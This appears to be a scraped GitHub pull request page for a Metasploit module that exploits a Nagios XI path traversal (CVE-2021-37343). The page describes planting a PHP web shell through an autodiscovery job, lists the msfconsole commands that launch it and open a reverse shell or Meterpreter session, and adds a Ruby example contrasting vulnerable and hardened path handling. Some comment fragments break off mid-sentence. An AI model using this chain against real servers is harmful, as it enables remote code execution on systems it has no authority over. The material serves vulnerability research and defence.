Nagios XI Web Shell Upload Module (CVE-2021-37343) #16150
…h configuration, and used vars_get in a couple of places
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Retested after merging @space-r7's recent suggestion/commit in

Thanks for the mention @jbaines-r7! This looks great! I'm happy to hear you were able to get some use out of my mixin and scanner. If you ever have some extra time, there are several additional RCE vectors that were found in recent years that could still be added, like these. I was planning to look into that at some point, but I never got around to it.

Here's a test on version

Regarding the

I added the

Release Notes
This exploits a path traversal vulnerability in Nagios XI versions below

@jbaines-r7 cool module! But why not complete the chain with CVE-2021-37347 to get root? ;)
Description
This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343). The path traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as `www-data`. The module achieves this by creating an autodiscovery job with an `id` field containing a path traversal to a writable and remotely accessible directory, and a `custom_ports` field containing the web shell. A cron file will be created using the chosen path and file name, and the web shell is embedded in the cron file.

After the web shell has been written to the victim, this module will then use the web shell to establish a Meterpreter session or a reverse shell. By default, the web shell is deleted by the module, and the autodiscovery job is removed as well.
Additional Details
I tied the module into @ErikWynter's Nagios XI scanner (great stuff, Erik!). I only needed to slide in identifying information and all worked well. Rubocop had a few things to say about `rce_check.rb` that made the diff slightly bigger but nothing crazy. `msftidy` does have two complaints still about `rce_check.rb` - I would have fixed them but they are absolutely meaningless to me, hopefully a reviewer can provide guidance:

One thing I opted not to include in the module was the `finish install` logic that appears in a couple of other Nagios modules. The same logic appears in `nagios_xi_scanner` so it didn't seem right to copy and paste into my module as well.

The final oddity is that I left the affected versions to be 5.2.0 >= x < 5.8.5. Pre-5.2.0 is super old and I didn't feel like it was necessary to go spelunking back any further. Interestingly, the code at 5.2.0 is actually vulnerable to command injection (not just path traversal), I guess that probably received some sort of CVE along the way.

Here is the vulnerable bit at 5.2.0 (the issue is `$tmpfile`):

vs. 5.8.4:
Verification
Install Nagios XI 5.8.4 as described in the modules documentation.
msfconsole
use auxiliary/scanner/http/nagios_xi_scanner
set RHOST <ip>
set PASSWORD <password>
use exploit/linux/http/nagios_xi_autodiscovery_webshell
set RHOST <ip>
set PASSWORD <password>
check
set LHOST <ip>
run
Video || GTFO
https://www.youtube.com/watch?v=ZhEvtjqFLVI
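The description above turns on two details: a job `id` that is used as part of a file name escapes the directory the cron file was meant to land in, and the module's `check` is bounded by the affected range 5.2.0 <= x < 5.8.5. The following Ruby is an added illustration written for this page; it is neither Nagios XI's PHP nor the Metasploit module's code. The directory name, the `.php` job id and the exact way the id is joined onto the path are assumptions chosen to show the mechanism, not the product's real layout.

```ruby
# Added example (not Nagios XI or Metasploit code): path traversal through a
# user-controlled job id, a confinement check that rejects it, and a version
# range check matching the affected range stated in the PR.

# Hypothetical directory where autodiscovery job cron files are meant to live.
JOBS_DIR = '/var/spool/autodiscovery/jobs'.freeze

# Naive construction: the id is trusted and joined straight onto the directory,
# so "../" segments walk out of JOBS_DIR. Any extension the caller picks
# (here .php) survives, which is what lets the file be served and executed.
def naive_job_file(id)
  File.expand_path(File.join(JOBS_DIR, id))
end

# Hardened construction: accept only a tight identifier, resolve the path, and
# confirm it still sits strictly below JOBS_DIR. Returns nil when rejected.
# The prefix check is deliberately kept even though the regex already excludes
# "/" and "." so that the two controls fail independently.
def confined_job_file(id)
  return nil unless id.is_a?(String) && id.match?(/\A[A-Za-z0-9_-]{1,64}\z/)

  path = File.expand_path(File.join(JOBS_DIR, id))
  return nil unless path.start_with?(JOBS_DIR + '/')

  path
end

# Affected range as stated in the PR description: 5.2.0 <= version < 5.8.5.
# Gem::Version handles multi-digit components correctly ("5.10.0" > "5.8.5"),
# which a plain string comparison would get wrong.
def vulnerable_version?(version)
  v = Gem::Version.new(version)
  v >= Gem::Version.new('5.2.0') && v < Gem::Version.new('5.8.5')
rescue ArgumentError
  false
end

if $PROGRAM_NAME == __FILE__
  evil = '../../../../var/www/html/shell.php' # constructed traversal id
  puts "naive:    #{naive_job_file(evil)}"
  puts "confined: #{confined_job_file(evil).inspect}"
  puts "confined: #{confined_job_file('job-42')}"
  %w[5.1.9 5.2.0 5.8.4 5.8.5 5.10.0].each do |ver|
    puts "#{ver}: #{vulnerable_version?(ver) ? 'vulnerable' : 'not in range'}"
  end
end
```

The four `..` segments are sized to the assumed depth of `JOBS_DIR`; against a real target the attacker simply adds enough of them to reach `/`, which is why the fix is to constrain the id and re-check the resolved path rather than to strip a fixed number of `..`.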